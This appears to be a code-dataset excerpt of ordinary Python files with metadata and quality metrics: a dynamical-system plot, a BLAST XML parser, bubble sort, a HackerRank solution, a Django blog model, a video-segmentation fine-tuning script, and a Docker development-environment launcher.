| 0
| 0.00791
| 0.132353
| 2,040
| 66
| 130
| 30.909091
| 0.790395
| 0.32549
| 0
| 0
| 0
| 0
| 0.243382
| 0.077206
| 0.068966
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.068966
| 0
| 0.068966
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f5b2c35892025ff370debbb01a9bff69a798ad0
| 1,516
|
py
|
Python
|
models/python/hypothalamus/dynamical/old/simple.py
|
ABRG-Models/MammalBot
|
0b153232b94197c7a65156c1c3451ab2b9f725ae
|
[
"MIT"
] | null | null | null |
models/python/hypothalamus/dynamical/old/simple.py
|
ABRG-Models/MammalBot
|
0b153232b94197c7a65156c1c3451ab2b9f725ae
|
[
"MIT"
] | null | null | null |
models/python/hypothalamus/dynamical/old/simple.py
|
ABRG-Models/MammalBot
|
0b153232b94197c7a65156c1c3451ab2b9f725ae
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
T = 30000
# v = 0.02906
# v = 0.617085
v = 0.99
h = 0.01
a = 0.5
b = 0.5
epsilon = 0.05
c = 0.4
eta = lambda rho: np.exp(-(rho)**2/(2*c**2))
nrho = lambda rho, v: -2.0*(rho**3 + (rho-1.0)*v/2.0 - rho)/(rho + 1.0)
nu = lambda rho: (b - eta(rho+1))/a
u = np.zeros(T)
rho = np.zeros(T)
time = np.zeros(T)
# Maps
f = lambda rho, u, v: -rho**3 - (rho + 1.0)*u/2.0 - (rho - 1.0)*v/2.0 + rho
g1 = lambda rho, u, v: epsilon*(b - a*u - eta(rho+1))
# Initial conditions
u[0] = 0.0
rho[0] = -0.0
for i in range(T-1):
rho[i+1] = rho[i] + h*f(rho[i], u[i], v)
u[i+1] = u[i] + h*g1(rho[i], u[i], v)
time[i+1] = time[i] + h
fig, ax = plt.subplots(1, 2)
# X, Y = np.meshgrid(np.arange(-0.6, 0.6, 0.1), np.arange(-0.2, 1.0, .1))
# U = f(X, Y, v)/epsilon #rho
# V = g1(X, Y, v)/epsilon #u
# q = ax[0].quiver(X, Y, U, V, units='x', pivot='tip')#, width=0.022, scale=1 / 0.40)
rhos = np.linspace(-0.99, 1, 100)
ax[0].plot( rhos, nrho(rhos, v), color = [0.8, 0.5, 0.5], linewidth = 3.0)
ax[0].plot( rhos, nu(rhos), color = [0.5, 0.5, 0.8], linewidth = 3.0)
ax[0].plot( rho[0], u[0], 'k.', linewidth = 3.0)
ax[0].plot( rho, u, 'k' )
ax[0].plot( [-1, -1], [-1.5, 1.5], 'k--')
ax[0].set_ylabel('u')
ax[0].set_xlabel(r'$\rho$')
ax[0].text(0.5, nu(0.5)+0.05, r'$u_0$')
ax[0].text(0.95, nrho(0.9, v), r'$\rho_0$')
ax[0].axis([-2, 2, -1.0, 1.5])
ax[1].plot( time, u, label = 'u')
ax[1].plot( time, rho, label = r'$\rho$' )
ax[1].legend()
ax[1].set_xlabel('time')
plt.show()
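# Editor's note: the integration loop above is plain forward Euler with step
# h = 0.01 over T = 30000 steps, i.e. 300 time units in total; each state is
# advanced as x[i+1] = x[i] + h * dx/dt evaluated at step i. A minimal standalone
# version of the same scheme (names are illustrative) would be:
#   def euler_step(x, dxdt, h=0.01):
#       return x + h * dxdt(x)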
| 28.603774
| 85
| 0.529024
| 357
| 1,516
| 2.232493
| 0.22409
| 0.041405
| 0.043915
| 0.022585
| 0.136763
| 0.102886
| 0.080301
| 0
| 0
| 0
| 0
| 0.126603
| 0.176781
| 1,516
| 53
| 86
| 28.603774
| 0.512019
| 0.168865
| 0
| 0
| 0
| 0
| 0.029624
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f5c0b0acb48624cb76c04ec88d096e81b40a0f1
| 176
|
py
|
Python
|
test_script.py
|
SamPurle/DE17_Flask
|
a6462b85854f7bd72c80ebcc555d50488ef17e67
|
[
"MIT"
] | null | null | null |
test_script.py
|
SamPurle/DE17_Flask
|
a6462b85854f7bd72c80ebcc555d50488ef17e67
|
[
"MIT"
] | null | null | null |
test_script.py
|
SamPurle/DE17_Flask
|
a6462b85854f7bd72c80ebcc555d50488ef17e67
|
[
"MIT"
] | null | null | null |
import numpy as np
import os
my_array = np.zeros(10)
print(my_array)
os.system('pip freeze > requirements.txt')
my_list = [1,2,3,4,5]
for item in my_list:
print(item)
| 12.571429
| 42
| 0.693182
| 34
| 176
| 3.470588
| 0.705882
| 0.118644
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.048276
| 0.176136
| 176
| 13
| 43
| 13.538462
| 0.765517
| 0
| 0
| 0
| 0
| 0
| 0.164773
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0.25
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f5ebabcae4886b932638d5f3ecd10d1eb595d7b
| 6,058
|
py
|
Python
|
lib/blastin.py
|
zbwrnz/blastdbm
|
ee694c01ebb00779623702738a9c958fd496a080
|
[
"Unlicense"
] | 1
|
2018-03-22T10:34:20.000Z
|
2018-03-22T10:34:20.000Z
|
lib/blastin.py
|
arendsee/blastdbm
|
ee694c01ebb00779623702738a9c958fd496a080
|
[
"Unlicense"
] | null | null | null |
lib/blastin.py
|
arendsee/blastdbm
|
ee694c01ebb00779623702738a9c958fd496a080
|
[
"Unlicense"
] | null | null | null |
#! /usr/bin/python3
import argparse
import os
import re
import sqlite3 as sql
import sys
import xml.etree.cElementTree as et
import traceback
import lib.initialize as initialize
import lib.sqlite_interface as misc
import lib.meta as meta
# ==================
# EXPORTED FUNCTIONS
# ==================
def parse(parent, *args, **kwargs):
parser = parent.add_parser(
'blast',
help="Read BLAST XML report into SQL database",
parents=args)
parser.add_argument(
'-c', '--collection',
metavar="COL",
help="blast collection")
parser.add_argument(
'-m', '--db_desc',
metavar="DESC",
help="BLAST database description")
parser.add_argument(
'-s', '--small',
help="Reduce database size by not writing alignment sequences",
action=('store_true'), default=False)
parser.add_argument(
'-x', '--max-hits',
metavar="INT",
help='Maximum number of hits to store (default 500)',
type=int,
default=500
)
parser.set_defaults(func=parse_blast_xml)
def parse_blast_xml(args, cur):
if args.input:
for f in args.input:
con = et.iterparse(f, events=('end', 'start'))
_parse_blast_xml(args, cur, con)
else:
con = et.iterparse(sys.stdin, events=('end', 'start'))
_parse_blast_xml(args, cur, con)
def _parse_blast_xml(args, cur, con):
# Initialize tables as necessary
if(not misc.table_exists('blastreport', cur)):
initialize.init_blastreport(cur, verbose=False)
if(not misc.table_exists('blastdatabase', cur)):
initialize.init_blastdatabase(cur, verbose=False)
bdat = Blastdat(cur, args)
for event, elem in con:
if(event == 'start'): continue
if(elem.tag == 'Hsp'):
bdat.add_partial_row()
bdat.clear_hsp()
elif(elem.tag == 'Hit'):
bdat.clear_hit()
elif(elem.tag == 'Iteration'):
if(not bdat.has_hits()):
bdat.add_partial_row()
bdat.clear_iter()
elem.clear()
elif('BlastOutput_db' in elem.tag):
base = os.path.basename(elem.text)
if(not misc.entry_exists('blastdatabase', 'database', base, cur)):
misc.insert({'database': base}, 'blastdatabase', cur)
bdat.add(elem.tag, base)
else:
bdat.add(elem.tag, elem.text)
bdat.write_rows_to_sqldb()
meta.update_dbinfo(cur, verbose=True)
meta.update_mrca(cur, verbose=True)
def _parse_fasta_header(header):
dic = {}
try:
for match in re.finditer('([^|]+)\|([^|]+)', header):
for tag in ('locus', 'gi', 'taxon', 'gb', 'gene'):
if(match.group(1) == tag and match.group(2) != None):
dic['Query_' + tag] = match.group(2)
return(dic)
except:
print("Cannot parse header {}".format(header), file=sys.stderr)
return({})
class Blastdat:
def __init__(self, cur, args):
self.cur = cur
self.args = args
self.dat = {'root':{}, 'iter':{}, 'stat':{}, 'hit':{}, 'hsp':{}}
self.dat['root']['collection'] = args.collection
self.dat['root']['db_desc'] = args.db_desc
self.iter_dicts = []
self.row_by_col = {}
def write_rows_to_sqldb(self):
for col in self.row_by_col.keys():
misc.insertmany(col, self.row_by_col[col], 'BlastReport',
self.cur, replace=True)
def has_hits(self):
try:
if('No hits found' in self.dat['iter']['Iteration_message']):
return False
except:
pass
return True
def add_partial_row(self):
table = {}
for key in self.dat.keys():
for subkey in self.dat[key].keys():
table[subkey] = self.dat[key][subkey]
self.iter_dicts.append(table)
def _add_rows(self):
if(not self.iter_dicts):
self.add_partial_row()
else:
for d in self.iter_dicts:
if(int(d['Hit_num']) <= self.args.max_hits):
for key, val in self.dat['stat'].items():
d[key] = val
col = tuple(sorted(d.keys()))
row = tuple(map(d.get, col))
try:
self.row_by_col[col].append(row)
except:
self.row_by_col[col] = [row]
self.iter_dicts = []
def clear_iter(self):
'''
Adds all data from current iteration to the database and frees the
iteration and its children hits and hsps from memory
'''
self._add_rows()
self.dat['iter'] = {}
self.dat['stat'] = {}
self.clear_hit()
def clear_hit(self):
'''
Clears the current hit and all children hsps from memory
'''
self.dat['hit'] = {}
self.clear_hsp()
def clear_hsp(self):
'''
Clears hsp from memory
'''
self.dat['hsp'] = {}
def add(self, tag, text):
'''
Input: One tag and its text (possibly None)
'''
tag = re.sub('-', '_', tag)
if(text is None or text.isspace()): pass
elif('Hsp_' in tag):
if(tag in ('Hsp_qseq', 'Hsp_hseq', 'Hsp_midline') and self.args.small):
pass
else:
self.dat['hsp'][tag] = text
elif('Hit_' in tag):
self.dat['hit'][tag] = text
elif('Iteration_' in tag):
if(tag == 'Iteration_query_def'):
self.dat['iter']['query_seqid'] = re.sub('(\S+).*', '\\1', text)
self.dat['iter'][tag] = text
elif('Statistics_' in tag):
self.dat['stat'][tag] = text
elif('BlastOutput_' in tag or 'Parameters_' in tag):
if('reference' in tag or 'query' in tag):
pass
else:
self.dat['root'][tag] = text
| 31.552083
| 83
| 0.530538
| 733
| 6,058
| 4.249659
| 0.268759
| 0.038202
| 0.020867
| 0.019262
| 0.083467
| 0.05618
| 0.023756
| 0.023756
| 0.023756
| 0
| 0
| 0.002925
| 0.322879
| 6,058
| 191
| 84
| 31.717277
| 0.75646
| 0.05794
| 0
| 0.155844
| 0
| 0
| 0.124955
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084416
| false
| 0.025974
| 0.064935
| 0
| 0.168831
| 0.006494
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f67096a7114362044846dbb3a2978d1562f88ac
| 700
|
py
|
Python
|
Python-AI-Algorithms/Bubble_sort.py
|
screadore/Artificial-Intelligence-Sorting-Algorithms
|
d69f34dbd02556c6a7bbb8e0dee45ab7fdb4b12c
|
[
"MIT"
] | null | null | null |
Python-AI-Algorithms/Bubble_sort.py
|
screadore/Artificial-Intelligence-Sorting-Algorithms
|
d69f34dbd02556c6a7bbb8e0dee45ab7fdb4b12c
|
[
"MIT"
] | null | null | null |
Python-AI-Algorithms/Bubble_sort.py
|
screadore/Artificial-Intelligence-Sorting-Algorithms
|
d69f34dbd02556c6a7bbb8e0dee45ab7fdb4b12c
|
[
"MIT"
] | null | null | null |
# Bubble sort steps through the list and compares adjacent pairs of elements. The elements are swapped if they are in the wrong order. The pass through the unsorted portion of the list is repeated until the list is sorted. Because Bubble sort repeatedly passes through the unsorted part of the list, it has a worst case complexity of O(n²).
def bubble_sort(arr):
def swap(i, j):
arr[i], arr[j] = arr[j], arr[i]
n = len(arr)
swapped = True
x = -1
while swapped:
swapped = False
x = x + 1
for i in range(1, n - x):
if arr[i - 1] > arr[i]:
swap(i - 1, i)
swapped = True
return arr
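# Example usage (editor's addition, not in the original file): bubble_sort sorts
# the list in place and returns the same list.
if __name__ == '__main__':
    print(bubble_sort([5, 1, 4, 2, 8]))  # [1, 2, 4, 5, 8]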
| 36.842105
| 342
| 0.591429
| 111
| 700
| 3.720721
| 0.477477
| 0.067797
| 0.087167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012848
| 0.332857
| 700
| 19
| 343
| 36.842105
| 0.87152
| 0.482857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f670af72f12c73cbff679c29371d4269f74b778
| 551
|
py
|
Python
|
Practice/Python/Strings/the_minion_game.py
|
nifannn/HackerRank
|
b05318251226704b1fb949c29aa49493d6ced44b
|
[
"MIT"
] | 7
|
2019-02-22T10:34:26.000Z
|
2021-07-13T01:51:48.000Z
|
Practice/Python/Strings/the_minion_game.py
|
nifannn/HackerRank
|
b05318251226704b1fb949c29aa49493d6ced44b
|
[
"MIT"
] | null | null | null |
Practice/Python/Strings/the_minion_game.py
|
nifannn/HackerRank
|
b05318251226704b1fb949c29aa49493d6ced44b
|
[
"MIT"
] | 7
|
2018-11-09T13:52:34.000Z
|
2021-03-18T20:36:22.000Z
|
def minion_game(string):
# Stuart score
s_idx = [i for i, c in enumerate(string) if c not in 'AEIOU']
s_score = sum([len(string)-i for i in s_idx])
# Kevin score
k_idx = [i for i, c in enumerate(string) if c in 'AEIOU']
k_score = sum([len(string)-i for i in k_idx])
# final result
if k_score > s_score:
print("Kevin {}".format(k_score))
elif k_score < s_score:
print("Stuart {}".format(s_score))
else:
print("Draw")
if __name__ == '__main__':
minion_game(input("Enter a string: "))
| 30.611111
| 65
| 0.604356
| 91
| 551
| 3.417582
| 0.351648
| 0.051447
| 0.064309
| 0.051447
| 0.450161
| 0.340836
| 0.340836
| 0.340836
| 0.186495
| 0.186495
| 0
| 0
| 0.255898
| 551
| 17
| 66
| 32.411765
| 0.758537
| 0.067151
| 0
| 0
| 0
| 0
| 0.107843
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0
| 0
| 0.076923
| 0.230769
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f7622df0a14efca2dcdfe048326621ae11f4cbc
| 550
|
py
|
Python
|
blog/models.py
|
Happy-Project-Foundation/HappyProject
|
86e9fa7633e68c026e0003f8494df0226fa0dfcf
|
[
"Apache-2.0"
] | 3
|
2021-12-04T15:00:54.000Z
|
2021-12-08T16:07:35.000Z
|
blog/models.py
|
BirnadinErick/HappyProject
|
4993a2d966d9c1458ce0e29e72c3a758a7a4ef54
|
[
"Apache-2.0"
] | 3
|
2021-12-15T00:49:01.000Z
|
2021-12-16T00:46:14.000Z
|
blog/models.py
|
Happy-Project-Foundation/HappyProject
|
86e9fa7633e68c026e0003f8494df0226fa0dfcf
|
[
"Apache-2.0"
] | 3
|
2021-12-04T14:18:15.000Z
|
2021-12-05T08:40:13.000Z
|
import uuid
from django.db import models
from django.db.models.fields import TextField
class Blog(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
title = models.CharField(verbose_name="Title", max_length=150, default="Happy Blog", blank=False)
content = models.TextField(verbose_name="Content:", max_length=500, blank=False, default="Happy Content")
summary = models.TextField(verbose_name="Summary", max_length=300,
blank=True)
def __str__(self):
return self.title
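# Editor's note (standard Django workflow, not part of the original file): after
# adding or changing this model, the schema change would typically be applied with
#   python manage.py makemigrations blog
#   python manage.py migrate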
| 32.352941
| 109
| 0.736364
| 74
| 550
| 5.324324
| 0.5
| 0.083756
| 0.060914
| 0.13198
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021322
| 0.147273
| 550
| 16
| 110
| 34.375
| 0.818763
| 0
| 0
| 0
| 0
| 0
| 0.078182
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.272727
| 0.090909
| 0.909091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f79434b07d0fd0852489b19f8f438fa54ae857d
| 7,273
|
py
|
Python
|
finetune_test.py
|
tengfeixue-victor/One-Shot-Animal-Video-Segmentation
|
15f9011c1b10f1e0c068f90ed46e72b3bc343310
|
[
"MIT"
] | 2
|
2021-09-26T07:03:54.000Z
|
2022-02-21T15:46:30.000Z
|
finetune_test.py
|
tengfeixue-victor/One-Shot-Animal-Video-Segmentation
|
15f9011c1b10f1e0c068f90ed46e72b3bc343310
|
[
"MIT"
] | null | null | null |
finetune_test.py
|
tengfeixue-victor/One-Shot-Animal-Video-Segmentation
|
15f9011c1b10f1e0c068f90ed46e72b3bc343310
|
[
"MIT"
] | 1
|
2021-04-16T06:11:41.000Z
|
2021-04-16T06:11:41.000Z
|
"""
References: https://github.com/scaelles/OSVOS-TensorFlow
"""
from __future__ import print_function
import os
import random
import tensorflow as tf
import time
import numpy as np
from utils import models
from utils.load_data_finetune import Dataset
from utils.logger import create_logger
# seed
seed = random.randint(1, 100000)
# seed = 0
tf.random.set_seed(seed)
random.seed(seed)
np.random.seed(seed)
# User defined path parameters
# finetuning (one label) and testing dataset
sequence_images_path = './datasets/finetune_test_dataset/JPEGImages/480p'
sequence_names = os.listdir(sequence_images_path)
# Get the best frame selection from BubblNet
bub_frame_path = './datasets/bubbleNet_data/rawData'
def create_non_exist_file(non_exist_file):
"""Create the file when it does not exist"""
if not os.path.exists(non_exist_file):
os.mkdir(non_exist_file)
def select_optimal_frame(seq_name):
"""Use the optimal frame from BubbleNet selection for fine-tuning"""
# # Select from BN0 or BNLF
# frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/all.txt')
# # Select from BN0
# frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BN0.txt')
# Select from BNLF
frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BNLF.txt')
frame_file = open(frame_txt, 'r')
frame_nums = frame_file.readlines()
# The following code is used to extract the name of frame selection
# refer to the txt file in './datasets/bubbleNet_data/rawData/frame_selection' for your information
if len(frame_nums) == 3:
frame_random_jpg = frame_nums[2][:9]
frame_random_png = frame_nums[2][:5] + '.png'
# when the two BubbleNet models select different frames, the txt file will have 5 lines
elif len(frame_nums) == 5:
frame_suggestion1_jpg = frame_nums[2][:9]
frame_suggestion1_png = frame_nums[2][:5] + '.png'
frame_suggestion2_jpg = frame_nums[4][:9]
frame_suggestion2_png = frame_nums[4][:5] + '.png'
frame_random_lst = random.choice(
[[frame_suggestion1_jpg, frame_suggestion1_png], [frame_suggestion2_jpg, frame_suggestion2_png]])
frame_random_jpg = frame_random_lst[0][:9]
frame_random_png = frame_random_lst[1][:9]
else:
raise ValueError("frame file from BubbleNet is not correct")
return frame_random_jpg, frame_random_png
def train_test(video_path_names):
start_time = time.time()
for sequence_name in video_path_names:
seq_name = "{}".format(sequence_name)
gpu_id = 0
# Train and test parameters
# training and testing or testing only
train_model = True
objectness_steps = 45000
# The path to obtain weights from objectness training
objectness_path = os.path.join('weights', 'objectness_weights', 'objectness_weights.ckpt-{}'.format(objectness_steps))
# The path to save weights of fine tuning
logs_path_base = os.path.join('weights', 'fine_tune_weights')
create_non_exist_file(logs_path_base)
logs_path = os.path.join(logs_path_base, seq_name)
logger = create_logger(logs_path_base)
logger.info('The random seed is {}'.format(seed))
max_training_iters = 200
# use GFS
use_GFS = True
# test data augmentation
test_aug = True
# train data augmentation
data_aug = True
logger.info('Data augmentation is {}'.format(data_aug))
logger.info('Test augmentation is {}'.format(test_aug))
logger.info('Use GFS is {}'.format(use_GFS))
# Define Dataset
# the video for testing
test_frames = sorted(
os.listdir(os.path.join('datasets', 'finetune_test_dataset', 'JPEGImages', '480p', seq_name)))
test_imgs = [os.path.join('datasets', 'finetune_test_dataset', 'JPEGImages', '480p', seq_name, frame) for frame
in test_frames]
# result paths
create_non_exist_file('results')
result_path_base = os.path.join('results', 'segmentation')
create_non_exist_file(result_path_base)
result_path = os.path.join(result_path_base, seq_name)
create_non_exist_file(result_path)
if train_model:
if use_GFS:
# BubbleNet selection: one optimal frame
frame_random_jpg, frame_random_png = select_optimal_frame(seq_name)
selected_image = os.path.join('datasets', 'finetune_test_dataset', 'JPEGImages', '480p', seq_name,
frame_random_jpg)
selected_mask = os.path.join('datasets', 'finetune_test_dataset', 'Annotations', '480p', seq_name,
frame_random_png)
train_imgs = [selected_image + ' ' + selected_mask]
logger.info('select frame {} in folder {}'.format(frame_random_jpg, seq_name))
else:
# Train on the first frame
logger.info('train on first frame')
train_imgs = [os.path.join('datasets', 'finetune_test_dataset',
'JPEGImages', '480p', seq_name, '00000.jpg') + ' ' + os.path.join('datasets', 'finetune_test_dataset',
'Annotations', '480p', seq_name, '00000.png')]
dataset = Dataset(train_imgs, test_imgs, './', data_aug=data_aug, test_aug=test_aug)
# testing only
else:
# test augmentation is on
dataset = Dataset(None, test_imgs, './', test_aug=test_aug)
# Train the network
if train_model:
# More training parameters
learning_rate = 1e-7
save_step = max_training_iters
# no side supervision
side_supervision = 3
logger.info('The supervision mode is {}'.format(side_supervision))
display_step = 10
with tf.Graph().as_default():
with tf.device('/gpu:' + str(gpu_id)):
# global_step is related to the name of the ckpt file
global_step = tf.Variable(0, name='global_step', trainable=False)
models.train_finetune(dataset, objectness_path, side_supervision, learning_rate, logs_path,
max_training_iters, save_step, display_step, global_step, logger, finetune=2,
iter_mean_grad=1, ckpt_name=seq_name, dropout_rate=1.0)
# Test the network
with tf.Graph().as_default():
with tf.device('/gpu:' + str(gpu_id)):
# No fine-tuning
checkpoint_path = os.path.join('weights/fine_tune_weights/', seq_name,
seq_name + '.ckpt-' + str(max_training_iters))
# generate results images(binary) to the results path
models.test(dataset, checkpoint_path, result_path)
end_time = time.time()
running_time = round(end_time - start_time, 3)
FPS = running_time/493.0
logger.info('The testing time is {}s'.format(running_time))
logger.info('The FPS is {}'.format(FPS))
if __name__ == '__main__':
train_test(sequence_names)
| 41.56
| 126
| 0.639214
| 933
| 7,273
| 4.705252
| 0.219721
| 0.028702
| 0.034169
| 0.043052
| 0.256036
| 0.205923
| 0.15467
| 0.140091
| 0.140091
| 0.140091
| 0
| 0.017331
| 0.262203
| 7,273
| 174
| 127
| 41.798851
| 0.800783
| 0.179843
| 0
| 0.083333
| 0
| 0
| 0.134641
| 0.047869
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0.083333
| 0
| 0.12037
| 0.009259
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f7a417145bc1e9d7aeea4542c8fef811419cb42
| 4,906
|
py
|
Python
|
codepod/impl.py
|
alexmorley/codepod
|
d932391beda9c4df7f048326afe7d0ea73ccb141
|
[
"Apache-2.0"
] | null | null | null |
codepod/impl.py
|
alexmorley/codepod
|
d932391beda9c4df7f048326afe7d0ea73ccb141
|
[
"Apache-2.0"
] | null | null | null |
codepod/impl.py
|
alexmorley/codepod
|
d932391beda9c4df7f048326afe7d0ea73ccb141
|
[
"Apache-2.0"
] | null | null | null |
import subprocess
import os
import shutil
import tempfile
import random
import string
import yaml
src_dir=os.path.dirname(os.path.realpath(__file__))
def codepod(*,repository='',image=None,volumes=[],mount_tmp=True,host_working_directory=None,docker_opts=None,git_smart=False,no_pull=False,command=False):
if not docker_opts:
docker_opts=''
if docker_opts.startswith('"'):
docker_opts=docker_opts[1:-1]
if host_working_directory is None:
if not repository:
raise Exception('You must either specify a repository or a host working directory.')
host_working_directory=_get_random_directory()
host_working_directory=os.path.abspath(host_working_directory)
if repository:
if os.path.exists(host_working_directory):
raise Exception('Host working directory already exists: '+host_working_directory)
_git_clone_into_directory(repository,host_working_directory)
config={}
if os.path.exists(host_working_directory+'/.codepod.yml'):
print(host_working_directory+'/.codepod.yml')
config=_parse_yaml(host_working_directory+'/.codepod.yml')
print(':::::::::::::::::::::::config:',config)
if image is None:
if 'image' in config:
image=config['image']
if image is None:
image='magland/codepod:latest'
print('Using image: '+image)
opts=[
'-it',
'--mount type=bind,source={src_dir}/codepod_init_in_container.py,destination=/codepod_init,readonly',
'--mount type=bind,source={host_working_directory},destination=/home/project',
'--network host',
'--privileged',
'-e DISPLAY=unix{}'.format(os.environ.get('DISPLAY','')),
'--mount type=bind,source=/tmp/.X11-unix,destination=/tmp/.X11-unix'
]
if command is not None:
del opts[0]
config['tasks'].append({'command':command})
# git configuration
#if [ -f "$HOME/.gitconfig" ]; then
# OPTS="$OPTS -v $HOME/.gitconfig:/home/theiapod/.gitconfig"
#fi
#if [ -d "$HOME/.git-credential-cache" ]; then
# OPTS="$OPTS -v $HOME/.git-credential-cache:/home/theiapod/.git-credential-cache"
#fi
path0=os.environ.get('HOME','')+'/.gitconfig'
if os.path.exists(path0):
print('Mounting '+path0)
opts.append('--mount type=bind,source={},destination={}'.format(path0,'/home/user/.gitconfig'))
path0=os.environ.get('HOME','')+'/.git-credential-cache'
if os.path.exists(path0):
print('Mounting '+path0)
opts.append('--mount type=bind,source={},destination={}'.format(path0,'/home/user/.git-credential-cache'))
if mount_tmp:
opts.append('--mount type=bind,source=/tmp,destination=/tmp')
for vv in volumes:
if type(vv)==tuple:
opts.append('--mount type=bind,source={},destination={}'.format(os.path.abspath(vv[0]),os.path.abspath(vv[1])))
else:
raise Exception('volumes must be tuples.')
if no_pull:
print('Not pulling docker image because no_pull was specified')
else:
try:
_run_command_and_print_output('docker pull {image}'.format(image=image))
except:
print('WARNING: failed to pull docker image: {image}... proceeding without pulling...'.format(image=image))
cmd='docker run {opts} {docker_opts} {image} /home/project {user} {uid}'
#cmd='docker run {opts} {image}'
cmd=cmd.replace('{opts}',' '.join(opts))
cmd=cmd.replace('{docker_opts}',docker_opts)
cmd=cmd.replace('{src_dir}',src_dir)
cmd=cmd.replace('{image}',image)
# cmd=cmd.replace('{repository}',repository)
cmd=cmd.replace('{host_working_directory}',host_working_directory)
cmd=cmd.replace('{user}',os.environ['USER'])
cmd=cmd.replace('{uid}',str(os.getuid()))
print('RUNNING: '+cmd)
os.system(cmd)
#_run_command_and_print_output(cmd)
#def _write_text_file(fname,txt):
# with open(fname,'w') as f:
# f.write(txt)
def _parse_yaml(fname):
try:
with open(fname) as f:
obj = yaml.safe_load(f)
return obj
except:
return None
def _get_random_directory():
return tempfile.gettempdir()+'/codepod_workspace_'+_get_random_string(10)
def _get_random_string(N):
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(N))
def _git_clone_into_directory(repo,path):
cmd='git clone {} {}'.format(repo,path)
_run_command_and_print_output(cmd)
def execute(cmd):
popen = subprocess.Popen(cmd, stdout=subprocess.PIPE, universal_newlines=True)
for stdout_line in iter(popen.stdout.readline, ""):
#yield stdout_line
print(stdout_line,end='\r')
popen.stdout.close()
return_code = popen.wait()
if return_code:
raise subprocess.CalledProcessError(return_code, cmd)
def _run_command_and_print_output(cmd):
print('RUNNING: '+cmd);
execute(cmd.split())
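# Usage sketch (editor's addition): execute() streams a command's stdout line by
# line and raises subprocess.CalledProcessError on a non-zero exit code, e.g.
#   execute(['git', '--version'])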
| 35.294964
| 155
| 0.664492
| 640
| 4,906
| 4.917188
| 0.254688
| 0.055926
| 0.101684
| 0.042262
| 0.224658
| 0.175405
| 0.116301
| 0.075628
| 0.06101
| 0.06101
| 0
| 0.004713
| 0.178353
| 4,906
| 138
| 156
| 35.550725
| 0.775986
| 0.091521
| 0
| 0.117647
| 0
| 0.019608
| 0.264746
| 0.113913
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068627
| false
| 0
| 0.068627
| 0.019608
| 0.176471
| 0.127451
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
